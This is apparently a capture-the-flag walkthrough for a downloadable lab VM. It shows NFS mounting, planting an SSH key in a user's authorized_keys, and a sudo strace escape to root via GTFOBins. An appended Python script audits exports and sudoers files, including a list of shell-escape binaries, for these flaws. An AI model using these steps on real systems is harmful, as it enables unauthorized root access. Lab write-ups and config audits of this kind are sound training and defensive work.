Download machine here

Let’s discover the machine IP with netdiscover.

Use nmap to scan for open ports.

Port 2049 (NFS) is open, so let’s mount it.

Create a new directory and use the mount command.

We can export folders belonging to peter

There are no interesting files.

Let’s create a local SSH key on our machine.

sudo su
cd /root/.ssh
ssh-keygen -t rsa

# Copy the public key to the /tmp folder
cp id_rsa.pub /tmp
# Change the owner of the file
chown peter:peter /tmp/id_rsa.pub

# Switch to peter
su peter

# Copy the file into the mounted .ssh folder as authorized_keys
# (run this from inside that folder)
cp /tmp/id_rsa.pub authorized_keys

Switch to the root user and log in via SSH.

sudo -l

We can run /usr/bin/strace as root.

Head to GTFOBins: https://gtfobins.github.io/gtfobins/strace/

Shell exploit
Root gained!
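
From the defender's side, both weaknesses used above (the mountable, writable NFS export of peter's home and the sudo rule for /usr/bin/strace) can be caught with a configuration audit. The following is an added example, not part of the original walkthrough: the sample /etc/exports and sudoers contents are constructed, and the function names are hypothetical.

```python
import re
# Short sample of binaries with a sudo shell escape listed on GTFOBins (strace is the one hit here).
SHELL_ESCAPE_BINS = {"strace", "find", "vim", "less", "awk"}
# Constructed sample configs (not copied from the target machine).
SAMPLE_EXPORTS = """\
# /etc/exports
/home/peter  *(rw,sync,no_subtree_check)
/srv/iso     192.168.56.0/24(ro,sync)
"""
SAMPLE_SUDOERS = """\
Defaults env_reset
peter  ALL=(root) NOPASSWD: /usr/bin/strace
backup ALL=(root) /usr/bin/uptime
"""

def audit_exports(text):
    """Flag read-write NFS exports that any host can mount or that expose a home."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:  # no client listed means every host
            host, _, opts = client.partition("(")
            opts = set(opts.rstrip(")").split(","))
            if "rw" not in opts:  # exports default to read-only
                continue
            if host in ("", "*"):
                findings.append((path, "rw export open to any host"))
            if path.startswith("/home/"):
                findings.append((path, "writable home directory"))
    return findings

def audit_sudoers(text):
    """Flag sudo rules that allow a binary from SHELL_ESCAPE_BINS (simplified parser)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" not in line or line.startswith("Defaults"):
            continue
        user, spec = line.split()[0], line.split("=", 1)[1]
        spec = re.sub(r"^\s*\([^)]*\)\s*", "", spec)  # drop the (runas) part
        for cmd in spec.split(","):
            cmd = re.sub(r"^\s*(?:[A-Z]+:\s*)*", "", cmd).strip()  # drop NOPASSWD: etc.
            if cmd and cmd.split()[0].rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS:
                findings.append((user, cmd.split()[0]))
    return findings
```

Restricting the export to named client hosts (or making it read-only) and removing the strace rule from sudoers clears both findings.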
